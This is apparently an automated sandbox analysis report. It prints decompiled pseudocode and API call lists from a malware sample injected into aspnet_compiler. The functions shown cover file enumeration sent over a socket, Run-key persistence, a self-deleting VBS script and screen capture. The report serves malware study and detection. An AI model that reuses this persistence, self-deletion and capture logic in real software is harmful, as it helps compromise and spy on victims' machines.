                      • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Find$CreateFirstNext
                    • String ID:
                    • API String ID: 341183262-0
                    • Opcode ID: a8866b442efc8a751d2068498eb88e5b87138e0a566161d5edc2bb9b37029738
                    • Instruction ID: 4e170b996662dc82c888af41f7fe9c50681d869d22ff8177fab8d840ae628c7b
                    • Opcode Fuzzy Hash: a8866b442efc8a751d2068498eb88e5b87138e0a566161d5edc2bb9b37029738
                    • Instruction Fuzzy Hash: C68162715082415BC314FB62C896DEFB3A9AF90308F50493FF546631E2EF389A49C69E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E00406EB0(char _a4) {
                    				void* _v16;
                    				struct _WIN32_FIND_DATAW _v596;
                    				char _v620;
                    				void* _v632;
                    				char _v644;
                    				void* _v648;
                    				char _v652;
                    				void* _v656;
                    				char _v668;
                    				char _v676;
                    				void* _v700;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				int _t29;
                    				void* _t34;
                    				void* _t49;
                    				void* _t71;
                    				void* _t74;
                    				void* _t75;
                    				void* _t77;
                    
                    				_t74 = FindFirstFileW(E00401EE4( &_a4),  &_v596);
                    				_t80 = _t74 - 0xffffffff;
                    				if(_t74 != 0xffffffff) {
                    					E004020BF(_t49,  &_v668);
                    					E0040415E(_t49,  &_v644, _t71, _t75,  &(_v596.cFileName));
                    					_t72 = 0x4644f0;
                    					_t29 = E00406E2B(__eflags);
                    					_t50 = _t29;
                    					E00401EE9();
                    					__eflags = _t29;
                    					if(__eflags != 0) {
                    						E00401FC2( &_v676, 0x4644f0, _t74, E00402097(_t50,  &_v644, 0x4644f0, 0x250, __eflags,  &_v596, 0x250));
                    						L5:
                    						E00401FB8();
                    					}
                    					__eflags = FindNextFileW(_t74,  &_v596);
                    					if(__eflags != 0) {
                    						_t34 = E00402097(_t50,  &_v620, _t72, 0x250, __eflags,  &_v596, 0x250);
                    						_t72 =  &_v676;
                    						E00401FC2( &_v676,  &_v676, _t74, E004087CF(_t50,  &_v652,  &_v676, 0x250, __eflags, _t34));
                    						E00401FB8();
                    						goto L5;
                    					}
                    					E004020D6(_t50, _t77 - 0x18, _t72, __eflags,  &_v668);
                    					_push(0x50);
                    					E00404A81(0x472fc0, _t72, __eflags);
                    					E00401FB8();
                    				} else {
                    					E0041A879(_t49, _t77 - 0x18,  &_a4);
                    					_push(0x54);
                    					E00404A81(0x472fc0,  &_a4, _t80);
                    				}
                    				return E00401EE9();
                    			}

























                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ECB
                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406F93
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNextsend
                    • String ID:
                    • API String ID: 4113138495-0
                    • Opcode ID: 118ed55c94b13efcbfdda2ea5d541ec650089f94d2f4392e937ce07913bff842
                    • Instruction ID: da33ce525bc8868546fe2e6bcae83f091993c6b7fab0c7b7f9de5ed664394571
                    • Opcode Fuzzy Hash: 118ed55c94b13efcbfdda2ea5d541ec650089f94d2f4392e937ce07913bff842
                    • Instruction Fuzzy Hash: F92143311043015BC714FB61DD96DEFB7ACEF90358F400A3EF596621D1EF389A09865A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E00450B93(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                    				signed int _v8;
                    				short _v248;
                    				void* __ebp;
                    				signed int _t16;
                    				signed int _t22;
                    				void* _t24;
                    				void* _t31;
                    				void* _t35;
                    				signed int* _t50;
                    				int _t53;
                    				signed int _t54;
                    
                    				_t16 =  *0x46f00c; // 0x54ba778e
                    				_v8 = _t16 ^ _t54;
                    				_t35 = E00446A95(__ebx, __ecx, __edx);
                    				_t50 =  *(E00446A95(_t35, __ecx, __edx) + 0x34c);
                    				_t53 = E00450C6B(_a4);
                    				asm("sbb ecx, ecx");
                    				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t35 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                    				if(_t22 != 0) {
                    					_t24 = E00452294(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
                    					if(_t24 != 0) {
                    						if( *(_t35 + 0x60) == 0 &&  *((intOrPtr*)(_t35 + 0x5c)) != 0) {
                    							_t31 = E00452294(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
                    							if(_t31 == 0) {
                    								_push(_t50);
                    								_push(_t31);
                    								goto L9;
                    							}
                    						}
                    					} else {
                    						if( *(_t35 + 0x60) != _t24) {
                    							L10:
                    							 *_t50 =  *_t50 | 0x00000004;
                    							_t50[1] = _t53;
                    							_t50[2] = _t53;
                    						} else {
                    							_push(_t50);
                    							_push(1);
                    							L9:
                    							_push(_t53);
                    							if(E00450DC3(_t35) != 0) {
                    								goto L10;
                    							}
                    						}
                    					}
                    				} else {
                    					 *_t50 =  *_t50 & _t22;
                    				}
                    				return E004338BB(_v8 ^ _t54);
                    			}















                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446AF4
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450BE7
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$InfoLocale_abort
                    • String ID:
                    • API String ID: 1663032902-0
                    • Opcode ID: 4597e0029ea091ecb2ebf5e98482b9f6fcb85861c7a3cfe2c1e922654fb1815e
                    • Instruction ID: d6adf83c33703ae5228b67ec7a49f9fec95c79c937f4ddcaaa5f3f490f6395be
                    • Opcode Fuzzy Hash: 4597e0029ea091ecb2ebf5e98482b9f6fcb85861c7a3cfe2c1e922654fb1815e
                    • Instruction Fuzzy Hash: DB21D6365002069BDB2D9F25DC42A7773ACEB06316F1001BBFD05D6242EB78ED88CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00450DC3(void* __ebx, signed int _a4, intOrPtr _a8) {
                    				short _v8;
                    				void* __ecx;
                    				void* __ebp;
                    				void* _t8;
                    				void* _t12;
                    				intOrPtr _t13;
                    				void* _t16;
                    				void* _t20;
                    				void* _t22;
                    				void* _t24;
                    				signed int _t27;
                    				intOrPtr* _t29;
                    
                    				_push(_t16);
                    				_t8 = E00446A95(__ebx, _t16, _t22);
                    				_t27 = _a4;
                    				_t24 = _t8;
                    				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
                    					if(_t27 == _v8 || _a8 == 0) {
                    						L7:
                    						_t12 = 1;
                    					} else {
                    						_t29 =  *((intOrPtr*)(_t24 + 0x50));
                    						_t20 = _t29 + 2;
                    						do {
                    							_t13 =  *_t29;
                    							_t29 = _t29 + 2;
                    						} while (_t13 != 0);
                    						if(E00450917( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
                    							goto L1;
                    						} else {
                    							goto L7;
                    						}
                    					}
                    				} else {
                    					L1:
                    					_t12 = 0;
                    				}
                    				return _t12;
                    			}

                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00450B61,00000000,00000000,?), ref: 00450DEF
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InfoLocale_abort_free
                    • String ID:
                    • API String ID: 2692324296-0
                    • Opcode ID: 10618e774f34a6619048d0637102a68081d551e0a0db41e4c1e10200fba24050
                    • Instruction ID: 265ab6a49acb69b6371535c2f9c40041978aee9ae2e746c74d294b287eb083f8
                    • Opcode Fuzzy Hash: 10618e774f34a6619048d0637102a68081d551e0a0db41e4c1e10200fba24050
                    • Instruction Fuzzy Hash: 41F0493AA40117ABDB245A64C8077BB7B68EB00315F148C6AEC05A3241EA38FD0986D4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E00446C84(void* __eflags) {
                    				int _t15;
                    				void* _t28;
                    
                    				E00433700(0x46ca10, 0xc);
                    				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
                    				E00444189( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
                    				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                    				 *0x470738 = E004425DA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
                    				_t15 = EnumSystemLocalesW(E00446C3E, 1);
                    				_push(0x20);
                    				asm("ror eax, cl");
                    				 *0x470738 = 0 ^  *0x46f00c;
                    				 *(_t28 - 0x1c) = _t15;
                    				 *(_t28 - 4) = 0xfffffffe;
                    				E00446CFC();
                    				return E00433746();
                    			}

                    APIs
                      • Part of subcall function 00444189: EnterCriticalSection.KERNEL32(-0006B43D,?,004418AB,00000000,0046C868,0000000C,00441866,?,?,?,00444427,?,?,00446B4A,00000001,00000364), ref: 00444198
                    • EnumSystemLocalesW.KERNEL32(00446C3E,00000001,0046CA10,0000000C), ref: 00446CBC
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    • API String ID: 1272433827-0
                    • Opcode ID: aa06587be2c9cb8b071f33295b8cbec66515d87765e7fc573258893074f482cb
                    • Instruction ID: 8a714871f2e0af15b08c3d487532fbc1d9fceb156b6070508e72b175ec7fb5e6
                    • Opcode Fuzzy Hash: aa06587be2c9cb8b071f33295b8cbec66515d87765e7fc573258893074f482cb
                    • Instruction Fuzzy Hash: F4F04F72610204EFE714EF68E886B5D77E0EB05725F10813BF844DB2E2DB799A808F59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004507D0(void* __ecx, void* __edx, signed char* _a4) {
                    				void* __ebp;
                    				intOrPtr _t9;
                    				signed char* _t13;
                    				void* _t14;
                    				intOrPtr* _t16;
                    				void* _t20;
                    				void* _t22;
                    
                    				_t20 = E00446A95(_t14, __ecx, __edx);
                    				_t16 =  *((intOrPtr*)(_t20 + 0x54));
                    				_t22 = _t16 + 2;
                    				do {
                    					_t9 =  *_t16;
                    					_t16 = _t16 + 2;
                    				} while (_t9 != 0);
                    				 *(_t20 + 0x64) = 0 | _t16 - _t22 >> 0x00000001 == 0x00000003;
                    				EnumSystemLocalesW(0x450727, 1);
                    				_t13 = _a4;
                    				if(( *_t13 & 0x00000004) == 0) {
                    					 *_t13 = 0;
                    					return _t13;
                    				}
                    				return _t13;
                    			}

                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                    • EnumSystemLocalesW.KERNEL32(00450727,00000001,?,?,?,00450F92,m3D,?,?,?,?,?,0044336D,?,?,?), ref: 00450807
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID:
                    • API String ID: 1084509184-0
                    • Opcode ID: 9174a0c065a7b49ba50cb90ab7ddfc1d90f3254fc2b27fe64f266881c7e4a03e
                    • Instruction ID: 6cc6cd71b12713b10ec057b6d25e2a24f4d08592f735aee3b5647b3ea735c769
                    • Opcode Fuzzy Hash: 9174a0c065a7b49ba50cb90ab7ddfc1d90f3254fc2b27fe64f266881c7e4a03e
                    • Instruction Fuzzy Hash: 6DF05C3930024597CB049F35DC05A6BBF50EFC2755B06805EEE058B641C635AC46CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0040EE14(void* __ecx) {
                    				char _v8;
                    				void* __ebp;
                    				void* _t8;
                    				void* _t11;
                    				void* _t13;
                    				void* _t15;
                    
                    				_push(__ecx);
                    				_t13 = __ecx;
                    				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
                    				E00402073(_t8, _t13, _t11, _t15,  &_v8);
                    				return _t13;
                    			}

                    APIs
                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00414839,00472EC8,00473950,00472EC8,00000000,00472EC8,00000000,00472EC8,4.6.0 Pro), ref: 0040EE28
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID:
                    • API String ID: 2299586839-0
                    • Opcode ID: 89d85122d4b319954b498ca729ef7b6588c5c2e3b4f1b669d3eb966a2cd12403
                    • Instruction ID: f278ed4507f78d565aa92993a3921e54a570b3fb05803534b7f05061c5bfe0db
                    • Opcode Fuzzy Hash: 89d85122d4b319954b498ca729ef7b6588c5c2e3b4f1b669d3eb966a2cd12403
                    • Instruction Fuzzy Hash: C0D05B30B4421C77E51096859C0AFAB7B9CD701B52F0001A6BA04D72C0D9E15E0087D5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E0040C929(void* __edx, void* _a4) {
                    				char _v0;
                    				short _v524;
                    				char _v548;
                    				void* _v560;
                    				char _v576;
                    				void* _v584;
                    				char _v596;
                    				char _v600;
                    				char _v612;
                    				char _v620;
                    				char _v624;
                    				char _v628;
                    				void* _v632;
                    				char _v644;
                    				char _v648;
                    				char _v652;
                    				void* _v656;
                    				char _v668;
                    				char _v672;
                    				char _v676;
                    				void* _v680;
                    				char _v692;
                    				void* _v696;
                    				char _v700;
                    				char _v704;
                    				char _v708;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t53;
                    				void* _t54;
                    				void* _t57;
                    				signed int _t61;
                    				void* _t62;
                    				void* _t67;
                    				void* _t78;
                    				void* _t79;
                    				void* _t92;
                    				void* _t93;
                    				signed char _t134;
                    				void* _t213;
                    				void* _t244;
                    				void* _t246;
                    				void* _t247;
                    				void* _t248;
                    
                    				_t213 = __edx;
                    				E00411D93();
                    				if( *0x46f9d4 != 0x30) {
                    					E0040AE1C();
                    				}
                    				_t244 =  *0x470d63 - 1; // 0x0
                    				if(_t244 == 0) {
                    					E004185EF(_t213, _t244);
                    				}
                    				if( *0x470a85 != 0) {
                    					E0041AC0A(E00401EE4(0x472d40), _t213);
                    				}
                    				_t230 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                    				_t246 =  *0x470b33 - 1; // 0x1
                    				if(_t246 == 0) {
                    					E00412D0B(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EE4(0x473208));
                    				}
                    				_t247 =  *0x470b30 - 1; // 0x1
                    				if(_t247 == 0) {
                    					E00412D0B(0x80000002, _t230, E00401EE4(0x473208));
                    				}
                    				_t248 =  *0x470b31 - 1; // 0x0
                    				if(_t248 == 0) {
                    					E00412D0B(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EE4(0x473208));
                    				}
                    				_t53 = E0040245C();
                    				_t54 = E00401F8B(0x473280);
                    				_t57 = E004129E0(E00401F8B(0x473238), "exepath",  &_v524, 0x208, _t54, _t53);
                    				_t249 = _t57;
                    				if(_t57 == 0) {
                    					GetModuleFileNameW(0,  &_v524, 0x208);
                    				}
                    				RegDeleteKeyA(0x80000001, E00401F8B(0x473238));
                    				_t61 = SetFileAttributesW( &_v524, 0x80);
                    				_t140 = 0x473250;
                    				asm("sbb bl, bl");
                    				_t134 =  ~_t61 & 0x00000001;
                    				_t62 = E00406E2B(_t249);
                    				_t250 = _t62;
                    				if(_t62 != 0) {
                    					_t140 = 0x473250;
                    					SetFileAttributesW(E00401EE4(0x473250), 0x80);
                    				}
                    				E00402FF4(_t134,  &_v600, E0040415E(_t134,  &_v668, 0x46a8f0, 0x46a8f0, E0043A99F(_t134, _t140, _t250, L"Temp")), 0, 0x46a8f0, _t250, L"\\update.vbs");
                    				E00401EE9();
                    				_t67 = E0040415E(_t134,  &_v672, _t64, 0x46a8f0, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                    				_t217 = L"On Error Resume Next\n";
                    				E004042DC(_t134,  &_v700, L"On Error Resume Next\n", 0x46a8f0, _t250, _t67);
                    				E00401EE9();
                    				_t251 = _t134;
                    				if(_t134 != 0) {
                    					_t217 = E004042DC(_t134,  &_v648, L"while fso.FileExists(\"", 0x46a8f0, _t251, E0040415E(_t134,  &_v620, L"On Error Resume Next\n", 0x46a8f0,  &_v524));
                    					E0040323D(E00402FF4(_t134,  &_v672, _t109, 0, 0x46a8f0, _t251, L"\")\n"));
                    					E00401EE9();
                    					E00401EE9();
                    					E00401EE9();
                    				}
                    				_t236 = L"\"\n";
                    				E0040323D(E00402FF4(_t134,  &_v624, E00402FF4(_t134,  &_v648, E0040415E(_t134,  &_v668, _t217, 0x46a8f0, L"fso.DeleteFile \""), 0, 0x46a8f0, _t251,  &_v524), 0, 0x46a8f0, _t251, L"\"\n"));
                    				E00401EE9();
                    				E00401EE9();
                    				E00401EE9();
                    				_t252 = _t134;
                    				if(_t134 != 0) {
                    					_t26 =  &_v692; // 0x465028
                    					L004086C6(_t134, _t26, 0, 0x46a8f0, L"wend\n");
                    				}
                    				_t220 = 0x46a8f0;
                    				_t78 = E00406E2B(_t252);
                    				_t253 = _t78;
                    				if(_t78 != 0) {
                    					_t220 = E0040AEF6( &_v644, L"fso.DeleteFolder \"", 0x46a8f0, 0x473250);
                    					E0040323D(E00402FF4(0x473250,  &_v620, _t101, 0, 0x46a8f0, _t253, _t236));
                    					E00401EE9();
                    					E00401EE9();
                    				}
                    				_t79 = E0040415E(0x473250,  &_v548, _t220, 0x46a8f0, L"\"\"\", 0");
                    				E0040323D(E00402FF4(0x473250,  &_v628, E00402F85( &_v652, E004042FD(0x473250,  &_v676, E0040415E(0x473250,  &_v576, _t220, 0x46a8f0, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0x46a8f0, _t253,  &_v0), _t79), 0, 0x46a8f0, _t253, "\n"));
                    				E00401EE9();
                    				E00401EE9();
                    				E00401EE9();
                    				E00401EE9();
                    				E00401EE9();
                    				L004086C6(0x473250,  &_v704, 0, 0x46a8f0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                    				_t92 = E00401EE4( &_v612);
                    				_t93 = E0040245C();
                    				E00401EE4( &_v708);
                    				if(E0041AD6A(_t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E00401EE4( &_v596), 0x46a8f0, 0x46a8f0, 0) > 0x20) {
                    					ExitProcess(0);
                    				}
                    				E00401EE9();
                    				E00401EE9();
                    				return E00401EE9();
                    			}

                    APIs
                      • Part of subcall function 00411D93: TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                      • Part of subcall function 00411D93: WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040CA21
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040CA34
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040CA4D
                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040CA7D
                      • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(00409880,00000000,pth_unenc,0040C5C1,00473220,00473238,?,pth_unenc), ref: 0040AE2B
                      • Part of subcall function 0040AE1C: UnhookWindowsHookEx.USER32(?), ref: 0040AE3B
                      • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(0040986A,00000000,?,pth_unenc), ref: 0040AE4D
                      • Part of subcall function 0041AD6A: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041AE89,00000000,00000000,?), ref: 0041ADA9
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000000), ref: 0040CCC8
                    • ExitProcess.KERNEL32 ref: 0040CCD4
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                    • String ID: """, 0$")$(PF$82G$@-G$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$P2G$P2G$P2G$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                    • API String ID: 1861856835-3214438867
                    • Opcode ID: 24672556332e620990219bda3f023fd5161334b1afc816b9838d8eee8101912b
                    • Instruction ID: f36577c89e8dd83dec34a85844eba9d7716d9325f3a0deb710764ed536580f15
                    • Opcode Fuzzy Hash: 24672556332e620990219bda3f023fd5161334b1afc816b9838d8eee8101912b
                    • Instruction Fuzzy Hash: 059182712042405BC718FB62D892AEF77E99F90308F10453FF546A71E2EE789D49C69E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E00417A23(void* __ecx, int __edx, void* __eflags) {
                    				signed int _v16;
                    				struct _ICONINFO _v132;
                    				signed int _v146;
                    				signed int _v148;
                    				char _v149;
                    				char _v152;
                    				signed int _v156;
                    				signed int _v160;
                    				void* _v164;
                    				struct HICON__* _v168;
                    				char _v172;
                    				int _v176;
                    				int _v180;
                    				int _v188;
                    				int _v196;
                    				intOrPtr _v224;
                    				void* _v228;
                    				char _v233;
                    				char _v236;
                    				struct HDC__* _v240;
                    				intOrPtr _v242;
                    				void* _v244;
                    				intOrPtr _v246;
                    				char _v248;
                    				intOrPtr _v250;
                    				signed int _v252;
                    				char _v256;
                    				char _v260;
                    				struct HDC__* _v268;
                    				void* _v284;
                    				void* _v296;
                    				struct HDC__* _v308;
                    				void* __ebx;
                    				void* __ebp;
                    				int _t104;
                    				void* _t111;
                    				void* _t113;
                    				int _t118;
                    				void* _t119;
                    				signed int _t122;
                    				signed char _t131;
                    				long _t137;
                    				void* _t138;
                    				void* _t177;
                    				void* _t179;
                    				void* _t185;
                    				void* _t195;
                    				signed int _t214;
                    				int _t218;
                    				void* _t219;
                    				struct HDC__* _t223;
                    				struct tagBITMAPINFO* _t225;
                    				void* _t226;
                    				int _t232;
                    				struct HDC__* _t234;
                    
                    				_t215 = __edx;
                    				_v149 = __edx;
                    				_t185 = __ecx;
                    				_t223 = CreateDCA("DISPLAY", 0, 0, 0);
                    				_v160 = _t223;
                    				_t234 = CreateCompatibleDC(_t223);
                    				_t104 = E00417E84(_v16);
                    				_v176 = _t104;
                    				_t218 = _t215;
                    				_v168 = _t218;
                    				if(_t104 == 0 || _t218 == 0) {
                    					_t104 = E00417EC6( *((intOrPtr*)((_v16 << 4) + 0x4726b0)));
                    					_t218 = _t215;
                    					_v176 = _t104;
                    					_v168 = _t218;
                    				}
                    				if(_t104 == 0 || _t218 == 0) {
                    					L8:
                    					E00402073(_t185, _t185, _t215, _t234, 0x464074);
                    					goto L9;
                    				} else {
                    					_t215 =  &_v160;
                    					_v160 = _v160 & 0x00000000;
                    					_v156 = _v156 & 0x00000000;
                    					E00417EFC( *((intOrPtr*)((_v16 << 4) + 0x4726b0)),  &_v160);
                    					_t219 = CreateCompatibleBitmap(_t223, _v176, _t218);
                    					_v164 = _t219;
                    					if(_t219 != 0) {
                    						_t111 = SelectObject(_t234, _t219);
                    						__eflags = _t111;
                    						if(_t111 != 0) {
                    							_t113 = StretchBlt(_t234, 0, 0, _v196, _v188, _t223, _v180, _v176, _v196, _v188, 0xcc0020);
                    							__eflags = _t113;
                    							if(_t113 == 0) {
                    								goto L11;
                    							}
                    							__eflags = _v233;
                    							if(_v233 != 0) {
                    								_v172 = 0x14;
                    								_t177 =  *0x4736e4( &_v172);
                    								__eflags = _t177;
                    								if(_t177 != 0) {
                    									_t179 = GetIconInfo(_v168,  &_v132);
                    									__eflags = _t179;
                    									if(_t179 != 0) {
                    										_t232 = _v160 - _v132.yHotspot - _v224;
                    										__eflags = _t232;
                    										DeleteObject(_v132.hbmColor);
                    										DeleteObject(_v132.yHotspot);
                    										DrawIcon(_t234, _v164 - _v132.xHotspot - _v228, _t232, _v176);
                    										_t219 = _v228;
                    										_t223 = _v240;
                    									}
                    								}
                    							}
                    							_push( &_v152);
                    							_t118 = 0x18;
                    							_t119 = GetObjectA(_t219, _t118, ??);
                    							__eflags = _t119;
                    							if(_t119 == 0) {
                    								goto L11;
                    							} else {
                    								_t122 = _v146 * _v148 & 0x0000ffff;
                    								__eflags = _t122 - 1;
                    								if(_t122 != 1) {
                    									_push(4);
                    									_pop(1);
                    									_v252 = 1;
                    									__eflags = _t122 - 1;
                    									if(_t122 <= 1) {
                    										L28:
                    										__eflags = 1 << 1;
                    										_push(0x2eb6edc);
                    										L29:
                    										_t225 = LocalAlloc(0x40, ??);
                    										_t195 = 0x18;
                    										_t225->bmiHeader = 0x28;
                    										_t225->bmiHeader.biWidth = _v160;
                    										_t225->bmiHeader.biHeight = _v156;
                    										_t225->bmiHeader.biPlanes = _v148;
                    										_t225->bmiHeader.biBitCount = _v146;
                    										_t131 = _v252;
                    										__eflags = _t131 - _t195;
                    										if(_t131 < _t195) {
                    											__eflags = 1;
                    											_t225->bmiHeader.biClrUsed = 1 << _t131;
                    										}
                    										_t225->bmiHeader.biCompression = _t225->bmiHeader.biCompression & 0x00000000;
                    										_t225->bmiHeader.biClrImportant = _t225->bmiHeader.biClrImportant & 0x00000000;
                    										asm("cdq");
                    										_t215 = 1;
                    										_t137 = (_t225->bmiHeader.biWidth + 8 >> 3) * (_v252 & 0x0000ffff) * _t225->bmiHeader.biHeight;
                    										_t225->bmiHeader.biSizeImage = _t137;
                    										_t138 = GlobalAlloc(0, _t137);
                    										_v244 = _t138;
                    										__eflags = _t138;
                    										if(_t138 != 0) {
                    											__eflags = GetDIBits(_t234, _t219, 0, _t225->bmiHeader.biHeight & 0x0000ffff, _t138, _t225, 0);
                    											if(__eflags != 0) {
                    												_v252 = 0x4d42;
                    												_v250 = _t225->bmiHeader.biSizeImage + _t225->bmiHeader + _t225->bmiHeader.biClrUsed * 4 + 0xe;
